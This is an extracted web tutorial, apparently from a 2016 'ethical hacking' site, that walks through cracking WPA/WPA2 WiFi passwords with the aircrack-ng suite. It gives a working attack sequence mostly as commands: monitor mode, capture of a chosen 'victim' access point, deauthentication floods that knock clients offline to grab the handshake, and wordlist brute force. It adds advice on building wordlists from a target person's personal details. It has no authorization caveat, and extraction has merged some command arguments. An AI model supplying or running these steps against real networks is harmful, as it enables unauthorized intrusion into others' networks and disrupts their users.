How to Hack WiFi : Cracking WPA2 WPA WiFi

Password [aircrack-ng] – Step by Step Guide

ethicalhackx.com/hack-wifi-cracking-wpa2-wpa-wifi-password

October 6, 2016

How to Hack WiFi : Cracking WPA2 WPA WiFi Password (100%)– Step by Step Guide

Requirements
1- Kali Linux or Backtrack
2- Compatible Wreless Network Adapter that is supported in Kali Linux or Backtrack.
3- A good Wordlist

Step By Step How to Crack WPA2 WPA WiFi ( I am using Kali Linux Here )

1- Boot into Kali Linux. Open Terminal.

2- Start

1 airmon-ng

to check the available devices we can use now .

This will show the devices and we have to start airmon-ng to monitor mode on one of these
devices probably wlan or wlan0 or wlan1

3- Enable monitor mode on wireless device

in terminal type

1/9
 1 airmon-ng start wlan0

This will create a new monitor mode interface which will be wlan0mon or mon or wlan1mon
, you should remember this or will have to check again from step 2.
If you face error just isse the followng command to correct it automatically and again run
the above command

1 airmon-ng check kill

4- Select the taget Wifi Router or Access Point.

We need to fix a target WiFi Access Point (Router) we want to crack, to focus our attack we
need Access Point’s (router) BSSID and Channel. Type the following commmand.

1 airodump-ng wlan0mon

2/9
we get a complete list of all reachable Access points with their BSSID Channel and Signal
Strength , Type of Encryption. We are intrested only in BSSID and Chanel because rest we
are going to crack. in th command above wlan0mon is the monitor mode interface we
created in step 3. Choose your Victim based on Signal Strength which is in PWR Cloumn.
When you got your Victim Access Point ( Router) you can stop this process by Ctrl+ C

5- Now we start packet capturing from th Victim by the following command

1 airodump-ng--bssid(AP BSSID address)-c(chaneel no)-w(file name you want tosave with)(monitor

interface)

3/9
Check the last line in above pic to see the command .

So here I type

1 airodump-ng--bssid F4:F2:6D:4E:3D:8E-c3-wWPAcrack wlan0mon

Packet Capturing has started

6- To capture a 4-wayhandshake we need clients connected to the Access Point to

Reauthenticate with Access point, the already connected devices a=are listed in Station
Column in step 5. So we can issue a command to send Deauthenticate signals to Access
Point so that the try to reauthenticate and we capture Handshake.

4/9
 1 aireplay-ng--deauth-a(BSSID of the network)-c(MAC address of the
client)-100(fordeauntheticate"100"forno of packets tosend)(monitor interface)

1 aireplay-ng--deauth1000-aF4:F2:6D:4E:3D:8Ewlan0mon

This will send deauth signal to Victim Access Point to disconnect all clients possible

1 aireplay-ng--deauth1000-aF4:F2:6D:4E:3D:8E-c9C:99:A0:F2:05:19wlan0mon

This will disconnect a particular clinet on Access Point ( Router ) to get Handshake Quickly.

5/9
7- After a few Successful handshake Capture we are ready to Crack the password and get
it in Plain Text.

Here we can see in Hilighted that Handshake from a Particular Client Captured. We can
also check our present Working Directory for the Captured handshake File

8- Lets Crack this using Bruteforce Attack with aircrack-ng

6/9
the default synatx for aircrack-ng is

1 aircrack-ng-w(location of the password list)(cap file *.cap)

So here we do start the bruteforce on captured 4-way Handshake file by

1 aircrack-ng-w'wordlist.txt'WPAcrack-01.cap

The Passowrd when crackd will be on you screen in Plaintext anytime soon.

7/9
DONE, Password here is 01202323680, Higlighted in Pic.

Depending on the CPU and other hardwaer Specifications of your System this process will
take some time as it may have to go through testing millions of passwords, So make a good
but short wordlist to cut sort the number attempts and time taken. On

We need a Dictionary or Wordlist file to use Sample Pawwords from ,

How to Create a good wordlist with crunch– How To Make Good Wordlist using Crunch
Default Wordlist in Backtrack is at – /pentest/passwords/worldlists/darkc0de.lst

Default Wrdlist in Kali can be located and coppied in current working directory with the
command below
cp /usr/share/wordlists/rockyou.txt.gz .
Unzip / Extract the wordlist file from the compressed file with this command
gunzip rockyou.txt.gz

Get the number of passwords in this wordlist file rock

wc -l rockyou.txt
14344392 passwords in this.

NOTE: A good wordlist should be short in case you know the person very well and can
guess the password, so a wordlist can be generated consisting of his house number ,
name, love affairs, mobile number, date of birth and similar info. It may also be very random
in that case you need a much bigger wordlist to try your patience. It may take even 10
Hours of time in that case. You may also download wordlists available on net or try the
Dictionary for whole words.

How To Disable monitor mode wlan0mon

1 airmon-ng stop wlan0mon

8/9
Don’t forget to restart the network manager. It is usually done with the following command:

1 service network-manager start

9/9